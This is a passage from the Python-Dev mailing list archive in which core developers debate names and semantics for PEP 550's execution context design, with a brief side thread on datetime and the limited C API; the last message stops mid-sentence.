[Python-Dev] PEP 550 v3 In-Reply-To: <599B6F33.9050803@canterbury.ac.nz> References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <599945C5.1030300@stoneleaf.us> <599B6F33.9050803@canterbury.ac.nz> Message-ID: On 22 August 2017 at 09:39, Greg Ewing wrote: > Ethan Furman wrote: >> >> So I like ExecutionContext for the stack of WhateverWeCallTheOtherContext >> contexts. But what do we call it? > > How about ExecutionContextFrame, by analogy with stack/stack frame. My latest suggestion to Yury was to see how the PEP reads with it called ImplicitContext, such that: * the active execution context is a stack of implicit contexts * ContextKey.set() updates the innermost implicit context * Contextkey.get() reads the whole stack of active implicit contexts * by default, generators (both sync and async) would have their own implicit context, but you could make them use the context of method callers by doing "gen.__implicit_context__ = None" * by default, coroutines would use their method caller's context, but async frameworks would make sure to give top-level tasks their own independent contexts That proposal came from an initial attempt at redrafting the Abstract and Rationale sections, where it turns out that one of the things the current version of the PEP is somewhat taking for granted is that the reader already has a particular understanding of the difference between explicit state management (i.e. passing things around as function arguments and instance attributes) and implicit state management (i.e. relying on process globals and thread locals). Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ncoghlan at gmail.com Tue Aug 22 01:17:15 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Tue, 22 Aug 2017 15:17:15 +1000 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <599B747F.1050208@canterbury.ac.nz> References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: On 22 August 2017 at 10:02, Greg Ewing wrote: > Yury Selivanov wrote: >> >> I can certainly see how "ContextFrame" can be correct if we think >> about "frame" as a generic term, but in Python, people will >> inadvertently think about a connection with frame objects/stacks. > > Calling it ExecutionContextFrame rather than just ContextFrame > would make it clear that it relates to ExecutionContexts in > particular. Please, no - it's already hard enough to help people internalise sync/async design concepts without also introducing ambiguity into the meaning of terms like locals & frame. Instead, let's leave those as purely referring to their existing always-synchronous concepts and find another suitable term for the dynamically nested read/write mappings making up the ExecutionContext :) Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From k7hoven at gmail.com Tue Aug 22 02:06:35 2017 From: k7hoven at gmail.com (Koos Zevenhoven) Date: Tue, 22 Aug 2017 09:06:35 +0300 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Tue, Aug 22, 2017 at 12:44 AM, Yury Selivanov wrote: > On Mon, Aug 21, 2017 at 5:39 PM, Koos Zevenhoven > wrote: > [..] > >> In the current version of the PEP, generators are initialized with an > >> empty LogicalContext. When they are being iterated (started or > >> resumed), their LogicalContext is pushed to the EC. When the > >> iteration is stopped (or paused), they pop their LC from the EC. > >> > > > > Another quick one before I go: Do we really need to push and pop a LC on > > each next() call, even if it most likely will never be touched? > > Yes, otherwise it will be hard to maintain the consistency of the stack. > > There will be an optimization: if the LC is empty, we will push NULL > to the stack, thus avoiding the cost of allocating an object. > > ? But if LCs are immutable, there needs to be only one empty-LC instance. That would avoid special-casing NULL in code. ?-- Koos? > I measured the overhead -- generators will become 0.5-1% slower in > microbenchmarks, but only when they do pretty much nothing. If a > generator contains more Python code than a bare "yield" expression, > the overhead will be harder to detect. -- + Koos Zevenhoven + http://twitter.com/k7hoven + -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Tue Aug 22 02:12:45 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 22 Aug 2017 02:12:45 -0400 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Tue, Aug 22, 2017 at 2:06 AM, Koos Zevenhoven wrote: [..] >> There will be an optimization: if the LC is empty, we will push NULL >> to the stack, thus avoiding the cost of allocating an object. >> > But if LCs are immutable, there needs to be only one empty-LC instance. That > would avoid special-casing NULL in code. Yes, this is true. Yury From tismer at stackless.com Tue Aug 22 10:09:37 2017 From: tismer at stackless.com (stackless) Date: Tue, 22 Aug 2017 16:09:37 +0200 Subject: [Python-Dev] limited_api and datetime Message-ID: <3F679D4C-FD35-4774-B06E-B753E6CB243F@stackless.com> Hi again, I am trying to support the limited Api (PEP 384) for PySide. Fortunately, everything worked out of the box, just the datetime module gives me a problem. Inspection showed that datetime is completely removed when the limitation is set. Can somebody enlighten me why that needs to be so? And how should I use datetime, instead: Fish the functions out of the dynamically imported datetime module? Thanks in advance - Chris Sent from my Ei4Steve From guido at python.org Tue Aug 22 11:22:27 2017 From: guido at python.org (Guido van Rossum) Date: Tue, 22 Aug 2017 08:22:27 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: As I understand the key APIs and constraints of the proposal better, I'm leaning towards FooContext (LC) and FooContextStack (EC), for some value of Foo that I haven't determined yet. Perhaps the latter can be shortened to just ContextStack (since the Foo part can probably be guessed from context. :-) -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From guido at python.org Tue Aug 22 11:34:55 2017 From: guido at python.org (Guido van Rossum) Date: Tue, 22 Aug 2017 08:34:55 -0700 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <599945C5.1030300@stoneleaf.us> <599B6F33.9050803@canterbury.ac.nz> Message-ID: On Mon, Aug 21, 2017 at 10:09 PM, Nick Coghlan wrote: > My latest suggestion to Yury was to see how the PEP reads with it > called ImplicitContext, such that: > > * the active execution context is a stack of implicit contexts > * ContextKey.set() updates the innermost implicit context > * Contextkey.get() reads the whole stack of active implicit contexts > * by default, generators (both sync and async) would have their own > implicit context, but you could make them use the context of method > callers by doing "gen.__implicit_context__ = None" > * by default, coroutines would use their method caller's context, but > async frameworks would make sure to give top-level tasks their own > independent contexts > > That proposal came from an initial attempt at redrafting the Abstract > and Rationale sections, where it turns out that one of the things the > current version of the PEP is somewhat taking for granted is that the > reader already has a particular understanding of the difference > between explicit state management (i.e. passing things around as > function arguments and instance attributes) and implicit state > management (i.e. relying on process globals and thread locals). > I think I like ImplicitContext. Maybe we can go with this as a working title at least. I think we should also rethink the form the key framework-facing APIs will take, and how they are presented in the PEP -- I am now leaning towards explaining this from the start as an immutable linked list of immutable mappings, where the OS-thread state gets updated to a new linked list when it is changed (either by ContextKey.set or by the various stack manipulations). I think this falls under several Zen-of-Python points: EIBTI, and "If the implementation is easy to explain, it may be a good idea." -- --Guido van Rossum (python.org/~guido ) -------------- next part -------------- An HTML attachment was scrubbed... URL: From greg.ewing at canterbury.ac.nz Tue Aug 22 19:12:20 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Wed, 23 Aug 2017 11:12:20 +1200 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: <599CBA54.5000106@canterbury.ac.nz> Guido van Rossum wrote: > Perhaps the latter can be > shortened to just ContextStack (since the Foo part can probably be > guessed from context. :-) -0.9, if I saw something called ContextStack turn up in a traceback I wouldn't necessarily jump to the conclusion that it was a stack of FooContexts rather than some other kind of context. EIBTI here, I think. -- Greg From python at mrabarnett.plus.com Tue Aug 22 19:46:30 2017 From: python at mrabarnett.plus.com (MRAB) Date: Wed, 23 Aug 2017 00:46:30 +0100 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <599CBA54.5000106@canterbury.ac.nz> References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <599CBA54.5000106@canterbury.ac.nz> Message-ID: <3d91f79c-2e52-7689-66a3-fe89b1c20cbf@mrabarnett.plus.com> On 2017-08-23 00:12, Greg Ewing wrote: > Guido van Rossum wrote: >> Perhaps the latter can be >> shortened to just ContextStack (since the Foo part can probably be >> guessed from context. :-) > > -0.9, if I saw something called ContextStack turn up in a traceback > I wouldn't necessarily jump to the conclusion that it was a stack > of FooContexts rather than some other kind of context. EIBTI here, > I think. > The PEP says """This PEP proposes a new mechanism to manage execution state""", so ExecutionState or ExecState? From njs at pobox.com Tue Aug 22 22:12:16 2017 From: njs at pobox.com (Nathaniel Smith) Date: Tue, 22 Aug 2017 19:12:16 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: On Tue, Aug 22, 2017 at 8:22 AM, Guido van Rossum wrote: > As I understand the key APIs and constraints of the proposal better, I'm > leaning towards FooContext (LC) and FooContextStack (EC), for some value of > Foo that I haven't determined yet. Perhaps the latter can be shortened to > just ContextStack (since the Foo part can probably be guessed from context. > :-) I guess I'll put in another vote for DynamicContext and DynamicContextStack. Though my earlier suggestion of these [1] sank like a stone, either because no-one saw it or because everyone hated it :-). We could do worse than just plain Context and ContextStack, for that matter. -n [1] https://mail.python.org/pipermail/python-ideas/2017-August/046840.html -- Nathaniel J. Smith -- https://vorpus.org From guido at python.org Tue Aug 22 23:51:02 2017 From: guido at python.org (Guido van Rossum) Date: Tue, 22 Aug 2017 20:51:02 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: > We could do worse than just plain Context and ContextStack, for that > matter. > I worry that that's going to lead more people astray thinking this has something to do with contextlib, which it really doesn't (it's much more closely related to threading.local()). Regarding DynamicAnything, I certainly saw it and didn't like it -- the only place where I've ever seen dynamic scoping was in Emacs Lisp, and I believe was first shown to me as anti-pattern thirty years ago. -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From njs at pobox.com Wed Aug 23 01:32:32 2017 From: njs at pobox.com (Nathaniel Smith) Date: Tue, 22 Aug 2017 22:32:32 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: On Tue, Aug 22, 2017 at 8:51 PM, Guido van Rossum wrote: > On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >> >> We could do worse than just plain Context and ContextStack, for that >> matter. > > > I worry that that's going to lead more people astray thinking this has > something to do with contextlib, which it really doesn't (it's much more > closely related to threading.local()). I guess that could be an argument for LocalContext and LocalContextStack, to go back full circle... -n -- Nathaniel J. Smith -- https://vorpus.org From ncoghlan at gmail.com Wed Aug 23 01:41:22 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 23 Aug 2017 15:41:22 +1000 Subject: [Python-Dev] limited_api and datetime In-Reply-To: <3F679D4C-FD35-4774-B06E-B753E6CB243F@stackless.com> References: <3F679D4C-FD35-4774-B06E-B753E6CB243F@stackless.com> Message-ID: On 23 August 2017 at 00:09, stackless wrote: > Hi again, > > I am trying to support the limited Api (PEP 384) for PySide. Fortunately, > everything worked out of the box, just the datetime module gives me > a problem. Inspection showed that datetime is completely removed > when the limitation is set. > > Can somebody enlighten me why that needs to be so? The main problem is that "datetime.h" defines several C structs that we wouldn't want to add to the stable ABI, and nobody has previously worked through details of the interface to see which parts of it could still be used even if those structs were made opaque, and the macros relying on them were switched to being functions instead. There are almost certainly pieces of it that *could* be usefully exposed, though. > And how should I use datetime, instead: Fish the functions out of > the dynamically imported datetime module? Yep, going via the Python level API rather than directly to the C API is the default answer, as that inherently hides any struct layout details behind PyObject*. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ncoghlan at gmail.com Wed Aug 23 02:21:47 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 23 Aug 2017 16:21:47 +1000 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: On 23 August 2017 at 13:51, Guido van Rossum wrote: > Regarding DynamicAnything, I certainly saw it and didn't like it -- the only > place where I've ever seen dynamic scoping was in Emacs Lisp, and I believe > was first shown to me as anti-pattern thirty years ago. As the original proponent of a Dynamic* naming scheme, I'll note that I eventually decided I didn't like it for the same reason I already didn't like naming schemes using either the word "local" or the word "frame": they all suggest a coupling to the synchronous call stack that deliberately isn't part of the proposal. That is (at least for me): - "local" suggests the implicit context will change when locals() changes - "frame" suggests the implicit context will change when the running frame changes - "dynamic" suggest dynamic scoping, which again suggests the implicit context will change on every function call None of those associations are true, since the essential point of the proposal is to *share* implicit state between frames of execution. The tricky part is defining exactly which frames should and shouldn't share their implicit context - threading.locals() is our current best attempt, and the PEP is mainly driven by the problems introduced by relying solely on that in programs that implement concurrent execution of Python code independently of the underlying operating system threads. My concern with "logical" context is different, which is that as a term it feels too *broad* to me: I'd expect the lexical context (nonlocals, module globals), the explicit context (function parameters), and the runtime context (process globals, threading.locals()) to also be considered part of the overall logical context. It's also a very computer-sciencey term of art - if you ask an arbitrary English speaker "What does 'logical' mean?", they're very *un*likely to give you an answer that has anything to do with logical threads of control in computer programs. My latest suggestion (ImplicitContext) has some of the same issues as "logical context" (since the runtime context is also implicit), but seems more defensible on the grounds of it aiming to be a more robust way of accessing and manipulating implicit state in concurrent programs, rather than it being the only kind of implicit state that exists in an application. As an English word, the sense of "capable of being understood from something else though unexpressed" (the first definition that Merriam-Webster give) also has the benefit of describing *exactly* what the PEP is aiming to achieve. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From tismer at stackless.com Wed Aug 23 02:31:59 2017 From: tismer at stackless.com (Christian Tismer) Date: Wed, 23 Aug 2017 08:31:59 +0200 Subject: [Python-Dev] limited_api and datetime In-Reply-To: References: <3F679D4C-FD35-4774-B06E-B753E6CB243F@stackless.com> Message-ID: <5fa73959-6562-5ee2-d976-7574c31e3383@stackless.com> Hi Nick, On 23.08.17 07:41, Nick Coghlan wrote: > On 23 August 2017 at 00:09, stackless wrote: >> Hi again, >> >> I am trying to support the limited Api (PEP 384) for PySide. Fortunately, >> everything worked out of the box, just the datetime module gives me >> a problem. Inspection showed that datetime is completely removed >> when the limitation is set. >> >> Can somebody enlighten me why that needs to be so? > > The main problem is that "datetime.h" defines several C structs that > we wouldn't want to add to the stable ABI, and nobody has previously > worked through details of the interface to see which parts of it could > still be used even if those structs were made opaque, and the macros > relying on them were switched to being functions instead. > > There are almost certainly pieces of it that *could* be usefully > exposed, though. > >> And how should I use datetime, instead: Fish the functions out of >> the dynamically imported datetime module? > > Yep, going via the Python level API rather than directly to the C API > is the default answer, as that inherently hides any struct layout > details behind PyObject*. Thank you very much for the clarification. I think we can live with the Python interface for now. Now I'm sure that I'm going the way to go. Cheers -- Chris -- Christian Tismer :^) tismer at stackless.com Software Consulting : http://www.stackless.com/ Karl-Liebknecht-Str. 121 : https://github.com/PySide 14482 Potsdam : GPG key -> 0xFB7BEE0E phone +49 173 24 18 776 fax +49 (30) 700143-0023 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: OpenPGP digital signature URL: From guido at python.org Wed Aug 23 11:46:13 2017 From: guido at python.org (Guido van Rossum) Date: Wed, 23 Aug 2017 08:46:13 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: On Tue, Aug 22, 2017 at 11:21 PM, Nick Coghlan wrote: > > As the original proponent of a Dynamic* naming scheme, I'll note that > I eventually decided I didn't like it for the same reason I already > didn't like naming schemes using either the word "local" or the word > "frame": they all suggest a coupling to the synchronous call stack > that deliberately isn't part of the proposal. > However, there is still *some* connection with the frame, though it's subtle. In particular the LC (using PEP v3 terms) for a generator is tied to that generator's frame (it becomes the top of the EC stack whenever that generator is resumed). I don't think we should call this out in the naming scheme though. -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From solipsis at pitrou.net Wed Aug 23 11:58:42 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 23 Aug 2017 17:58:42 +0200 Subject: [Python-Dev] PEP 550 v3 naming References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: <20170823175842.5a045798@fsol> For the record, I'm starting to think that "implicit context" is a reasonable name. (in case anyone is interested in those 2 cents of mine :-)) Regards Antoine. From yselivanov.ml at gmail.com Wed Aug 23 12:19:40 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Wed, 23 Aug 2017 12:19:40 -0400 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <20170823175842.5a045798@fsol> References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> Message-ID: I think that "implicit context" is not an accurate description of what LogicalContext is. "implicit context" only makes sense when we talk about decimal context. For instance, in: Decimal(1) + Decimal(2) decimal context is implicit. But this is "implicit" from the standpoint of that code. Decimal will manage its context *explicitly*. Fixing decimal context is only one part of the PEP though. EC will also allow to implement asynchronous task locals: current_request = new_context_key() async def handle_http_request(request): current_request.set(request) Here we explicitly set and will explicitly get values from the EC. We will explicitly manage the EC in asyncio.Task and when we schedule callbacks. Values stored in the EC are essentially globals (or TLS), which we don't call "implicit" in Python. PEP 550 calls generators and asynchronous tasks as "logical threads", and "logical context" stems directly from that notion. "implicit" only covers one part of what LC really is. It implies that all EC/LC operations are implicit, which they are not. Logical Context is a neutral abstract term. Implicit Context bears a specific meaning that I don't think is accurate. Yury From solipsis at pitrou.net Wed Aug 23 12:56:41 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 23 Aug 2017 18:56:41 +0200 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> Message-ID: <20170823185641.50393e4b@fsol> On Wed, 23 Aug 2017 12:19:40 -0400 Yury Selivanov wrote: > PEP 550 calls generators and asynchronous tasks as "logical threads", > and "logical context" stems directly from that notion. I wouldn't refer to a generator as a "thread" personally. A thread essentially executes without intervention from outside code, which is not the case for a generator (where resumption is controlled by explicit next() calls or iteration by the consumer). That is also why I proposed the more general "task" (and "task context"). Of course, capitalized "Task" is given a specific meaning by asyncio... Regards Antoine. From yselivanov.ml at gmail.com Wed Aug 23 14:27:55 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Wed, 23 Aug 2017 14:27:55 -0400 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <20170823185641.50393e4b@fsol> References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> Message-ID: On Wed, Aug 23, 2017 at 12:56 PM, Antoine Pitrou wrote: > On Wed, 23 Aug 2017 12:19:40 -0400 > Yury Selivanov wrote: >> PEP 550 calls generators and asynchronous tasks as "logical threads", >> and "logical context" stems directly from that notion. > > I wouldn't refer to a generator as a "thread" personally. A thread > essentially executes without intervention from outside code, which is > not the case for a generator (where resumption is controlled by > explicit next() calls or iteration by the consumer). I agree. That's why we are rewriting the PEP without mentioning "logical threads". > > That is also why I proposed the more general "task" (and "task > context"). Of course, capitalized "Task" is given a specific > meaning by asyncio... Yeah.. I like TaskContext when it's applied to asynchronous code. It doesn't really work for generators because we never refer to generators as tasks. Out of what was proposed so far to replace Logical Context: 1. DynamicContext: close to "dynamic scoping", but tries to avoid mentioning "scopes". There are only a few languages where dynamic scoping is implemented, so people are generally not aware of it. 2. ContextFrame and all frame-related names: implies that EC is somehow implemented on top of frames or is frame-specific (which is not always true). 3. ImplicitContext: covers one specific property observed from specific examples. Context in PEP 550 is managed explicitly in some cases. There are many use cases when API users will be working with it explicitly too (to wrirte/read data from it). FWIW I believe that "ExplicitContext" would be more accurate than "ImplicitContext". 4. LocalContext: we use "local" to describe local variables and scoping in Python, we want to avoid any confusion here. 5. TaskContext: works for asynchronous tasks, but not for generators. I don't think that replacing LogicalContext with any name in this list will make any improvement. Yury From guido at python.org Wed Aug 23 14:47:55 2017 From: guido at python.org (Guido van Rossum) Date: Wed, 23 Aug 2017 11:47:55 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> Message-ID: In favor of ImplicitContext is one point: it is indeed "implicit" if you compare it with the "explicit" way of passing state around, which would require an extra argument containing the state for any function that uses the state *or calls a function that uses the state* (recursively). On Wed, Aug 23, 2017 at 11:27 AM, Yury Selivanov wrote: > On Wed, Aug 23, 2017 at 12:56 PM, Antoine Pitrou > wrote: > > On Wed, 23 Aug 2017 12:19:40 -0400 > > Yury Selivanov wrote: > >> PEP 550 calls generators and asynchronous tasks as "logical threads", > >> and "logical context" stems directly from that notion. > > > > I wouldn't refer to a generator as a "thread" personally. A thread > > essentially executes without intervention from outside code, which is > > not the case for a generator (where resumption is controlled by > > explicit next() calls or iteration by the consumer). > > I agree. That's why we are rewriting the PEP without mentioning > "logical threads". > > > > > That is also why I proposed the more general "task" (and "task > > context"). Of course, capitalized "Task" is given a specific > > meaning by asyncio... > > Yeah.. I like TaskContext when it's applied to asynchronous code. It > doesn't really work for generators because we never refer to > generators as tasks. > > Out of what was proposed so far to replace Logical Context: > > 1. DynamicContext: close to "dynamic scoping", but tries to avoid > mentioning "scopes". There are only a few languages where dynamic > scoping is implemented, so people are generally not aware of it. > > 2. ContextFrame and all frame-related names: implies that EC is > somehow implemented on top of frames or is frame-specific (which is > not always true). > > 3. ImplicitContext: covers one specific property observed from > specific examples. Context in PEP 550 is managed explicitly in some > cases. There are many use cases when API users will be working with it > explicitly too (to wrirte/read data from it). FWIW I believe that > "ExplicitContext" would be more accurate than "ImplicitContext". > > 4. LocalContext: we use "local" to describe local variables and > scoping in Python, we want to avoid any confusion here. > > 5. TaskContext: works for asynchronous tasks, but not for generators. > > I don't think that replacing LogicalContext with any name in this list > will make any improvement. > > Yury > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > guido%40python.org > -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From ethan at stoneleaf.us Wed Aug 23 15:08:50 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Wed, 23 Aug 2017 12:08:50 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> Message-ID: <599DD2C2.2010402@stoneleaf.us> On 08/23/2017 11:27 AM, Yury Selivanov wrote: > Out of what was proposed so far to replace Logical Context: > >[...] > > I don't think that replacing LogicalContext with any name in this list > will make any improvement. How about ExecutionContext and ContextVars ? We are already used to different levels of variables: global, local, non-local, class. I think having variables tied to a Context, and having search flow back to previous Contexts, would be easy to understand. -- ~Ethan~ From yselivanov.ml at gmail.com Wed Aug 23 15:14:04 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Wed, 23 Aug 2017 15:14:04 -0400 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> Message-ID: On Wed, Aug 23, 2017 at 2:47 PM, Guido van Rossum wrote: > In favor of ImplicitContext is one point: it is indeed "implicit" if you > compare it with the "explicit" way of passing state around, which would > require an extra argument containing the state for any function that uses > the state *or calls a function that uses the state* (recursively). This is a good point, now I understand the reasoning better. I guess I'm looking at this from a perspective of PEP 550 users. They will use either ContextKey-like API described in the PEP now, or something similar to threading.local() to store values in the context of a generator or an async task. From the standpoint of the user, they work with some sort of of a "global" variable. To me, renaming LC to ImplicitContext sounds similar to saying that using global variables is implicit, or calling "global" scope "implicit". Yury From yselivanov.ml at gmail.com Wed Aug 23 15:17:24 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Wed, 23 Aug 2017 15:17:24 -0400 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <599DD2C2.2010402@stoneleaf.us> References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> Message-ID: > How about ExecutionContext and ContextVars ? > We are already used to different levels of variables: global, local, non-local, class. I think having variables tied to a Context, and having search flow back to previous Contexts, would be easy to understand. Yeah, I had this idea about ContextVars and so far I like it more than Context Keys and Context Values. In the next version of the PEP (will post it soon), we use Execution Context, Logical Context, and Context Variable terminology (the debate if we should use other names is, of course, still open). Yury From hodgestar+pythondev at gmail.com Wed Aug 23 16:05:50 2017 From: hodgestar+pythondev at gmail.com (Simon Cross) Date: Wed, 23 Aug 2017 22:05:50 +0200 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> Message-ID: What about "CoroutineScope" or "CoroutineContext"? From ethan at stoneleaf.us Wed Aug 23 18:47:44 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Wed, 23 Aug 2017 15:47:44 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> Message-ID: <599E0610.7090508@stoneleaf.us> On 08/23/2017 12:17 PM, Yury Selivanov wrote: >> How about ExecutionContext and ContextVars ? > >> We are already used to different levels of variables: global, local, non-local, class. I think having variables tied to a Context, and having search flow back to previous Contexts, would be easy to understand. > > Yeah, I had this idea about ContextVars and so far I like it more than > Context Keys and Context Values. > > In the next version of the PEP (will post it soon), we use Execution > Context, Logical Context, and Context Variable terminology (the debate > if we should use other names is, of course, still open). ContextVars is actually a different name for LogicalContext. So it would be: ExecutionContext = [ContextVars()[, ContextVars()[ ...]]] and you get the (thread.local similar) ContextVars by context_vars = sys.get_context_vars() # or whatever context_vars.verbose = ... -- ~Ethan~ From jimjjewett at gmail.com Thu Aug 24 00:32:45 2017 From: jimjjewett at gmail.com (Jim J. Jewett) Date: Thu, 24 Aug 2017 00:32:45 -0400 Subject: [Python-Dev] PEP 550 leak-in vs leak-out, why not just a ChainMap Message-ID: In https://mail.python.org/pipermail/python-dev/2017-August/148869.html Nick Coghlan wrote: > * what we want to capture at generator creation time is > the context where writes will happen, and we also > want that to be the innermost context used for lookups So when creating a generator, we want a new (empty) ImplicitContext map to be the head of the ChainMap. Each generator should have one of its own, just as each generator has its own frame. And the ChainMap delegation goes up the call stack, just as an exception would. Eventually, it hits the event loop (or other Executor) which is responsible for ensuring that the ChainMap eventually defers to the proper (Chain)Map for this thread or Task. > While the context is defined conceptually as a nested chain of > key:value mappings, we avoid using the mapping syntax because of the > way the values can shift dynamically out from under you based on who > called you ... > instead of having the problem of changes inside the > generator leaking out, we instead had the problem of > changes outside the generator *not* making their way in I still don't see how this is different from a ChainMap. If you are using a stack(chain) of [d_global, d_thread, d_A, d_B, d_C, d_mine] maps as your implicit context, then a change to d_thread map (that some other code could make) will be visible unless it is masked. Similarly, if the fallback for d_C changes from d_B to d_B1 (which points directly to d_thread), that will be visible for any keys that were previously resolved in d_A or d_B, or are now resolved in dB1. Those seem like exactly the cases that would (and should) cause "shifting values". This does mean that you can't cache everything in the localmost map, but that is a problem with the optimization regardless of how the implementation is done. In https://mail.python.org/pipermail/python-dev/2017-August/148873.html Yury Selivanov wrote: > Any code that uses EC will not see any difference [between mutable vs immutable but replaced LC maps], > because it can only work with the top LC. > Back to generators. Generators have their own empty LCs when created > to store their *local* EC modifications. OK, so just as they have their own frame, they have their own ChainMap, and the event loop is responsible for resetting the fallback when it schedules them. > When a generator is *being* iterated, it pushes its LC to the EC. When > the iteration step is finished, it pops its LC from the EC. I'm not sure it helps to think of a single stack. When the generator is active, it starts with its own map. When it is in the call chain of the active generator, its map will be in the chain of delegations. When neither it nor a descendant are active, no code will end up delegating to it. If the delegation graph has 543 generators delegating directly to the thread-wide map, there is no reason to pop/push an execution stack every time a different generator is scheduled, since only that generator itself (and code it calls) will even care. > HAMT is a way to efficiently implement immutable mappings ... > using regular dicts and copy, set() would be O(log N) Using a ChainMap, set affects only the localmost map and is therefore O(1). get could require stacksize lookups, but ... (A) How many values do you expect a typical generator to use? The django survey suggested mostly 0, sometimes 1, occasionally 2. So caching the values of all possible keys probably won't 